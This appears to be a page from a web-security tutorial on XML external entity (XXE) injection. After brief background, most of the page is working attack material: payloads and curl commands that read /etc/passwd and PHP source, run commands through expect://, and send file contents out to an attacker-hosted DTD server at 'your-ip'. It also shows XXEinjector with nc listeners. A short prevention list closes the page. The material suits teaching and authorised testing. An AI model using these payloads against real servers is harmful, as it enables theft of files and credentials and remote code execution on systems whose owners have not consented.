3.-XML-external-entity-xxe-injection

Introduction to XXE

Definition: XXE vulnerabilities occur when a web application parses XML input from a user without proper sanitization, allowing attackers to inject malicious XML entities.

Impact: Can lead to:

  • Sensitive file disclosure (e.g., reading /etc/passwd)

  • Server-side request forgery (SSRF)

  • Denial-of-service (DoS)

  • Remote code execution (RCE)

OWASP Top 10: XXE is considered a significant web security risk.

XML Basics

XML Structure:

  • XML documents consist of elements, attributes, entities, and declarations.

  • DTD (Document Type Definition): Defines the structure of an XML document and can be internal or external.

  • XML Entities: Variables within XML documents, including internal and external entities.

  • External entities can reference local or remote files.

Exploitation Techniques

1. Local File Disclosure

Identification: Look for web pages that accept XML input.

Exploitation: Define external entities to reference local files.

<!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<root>&xxe;</root>

Command:

curl -X POST -H "Content-Type: application/xml" -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><root>&xxe;</root>' http://target.com/vulnerable.php

2. Source Code Disclosure (PHP Filter)

<!DOCTYPE root [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<root>&xxe;</root>

Command:

curl -X POST -H "Content-Type: application/xml" -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]><root>&xxe;</root>' http://target.com/vulnerable.php

3. Remote Code Execution (RCE) with Expect

<!DOCTYPE root [ <!ENTITY xxe SYSTEM "expect://id"> ]>
<root>&xxe;</root>

Command:

curl -X POST -H "Content-Type: application/xml" -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY xxe SYSTEM "expect://id"> ]><root>&xxe;</root>' http://target.com/vulnerable.php

4. CDATA Exfiltration via External DTD

Create xxe.dtd:

<!ENTITY joined "%begin;%file;%end;">

Host the DTD file:

python3 -m http.server 8000

Send the XML payload:

<!DOCTYPE root [ <!ENTITY % begin "<![CDATA["> <!ENTITY % file SYSTEM "file:///var/www/html/file.txt"> <!ENTITY % end "]]>"> <!ENTITY % xxe SYSTEM "http://your-ip:8000/xxe.dtd"> %xxe; ]>
<root>&joined;</root>

Command:

curl -X POST -H "Content-Type: application/xml" -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % begin "<![CDATA["> <!ENTITY % file SYSTEM "file:///var/www/html/file.txt"> <!ENTITY % end "]]>"> <!ENTITY % xxe SYSTEM "http://your-ip:8000/xxe.dtd"> %xxe; ]><root>&joined;</root>' http://target.com/vulnerable.php

5. Error-Based XXE with External DTD

Create xxe.dtd:

<!ENTITY % file SYSTEM "file:///etc/hosts">
<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">

Host the DTD file:

python3 -m http.server 8000

Send the XML payload:

<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://your-ip:8000/xxe.dtd"> %remote; %error; ]>

Command:

curl -X POST -H "Content-Type: application/xml" -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://your-ip:8000/xxe.dtd"> %remote; %error; ]>' http://target.com/vulnerable.php

6. Out-of-Band (OOB) Exfiltration with External DTD

Create xxe.dtd:

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://your-ip:8000/?content=%file;'>">

Host a PHP server:

php -S 0.0.0.0:8000

Send the XML payload:

<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://your-ip:8000/xxe.dtd"> %remote; %oob; ]><root>&content;</root>

7. Automated XXE Exploitation with XXEinjector

Clone the tool:

git clone https://github.com/enjoiz/XXEinjector.git

Create request.txt:

POST /vulnerable.php HTTP/1.1
...headers...
<?xml version="1.0" encoding="UTF-8"?>
XXEINJECT

Run the exploit:

ruby XXEinjector.rb --host=your-ip --httpport=8000 --file=request.txt --path=/etc/passwd --oob=http --phpfilter

Set up listeners:

nc -lvp 8000

Capture DNS requests:

tcpdump -i tun0 port 53

XXE Prevention

  1. Disable DTDs: Configure XML parsers to disable DTD processing.

  2. Input Validation: Sanitize and validate XML input.

  3. Use Safe Parsing Libraries: Use XML parsers that are not vulnerable to XXE.

  4. Update Components: Keep XML libraries and related components up to date.

  5. Least Privilege: Run applications with minimal privileges.

  6. Web Application Firewall (WAF): Implement a WAF to filter malicious XML input.

Key Takeaways

  • Understand XML Entities: Internal vs. external entities.

  • Advanced XXE Attacks: OOB exfiltration, error-based XXE, and parameter entities.

  • Use Automated Tools: XXEinjector helps automate XXE attacks.

  • Always test legally: Conduct security tests only on systems where you have explicit permission.

  • Regular Updates and Fixes: Patch and monitor applications to prevent XXE vulnerabilities.

Previous2.-Insecure-direct-object-references-idorNextWeb-attacks-to-the-point

Last updated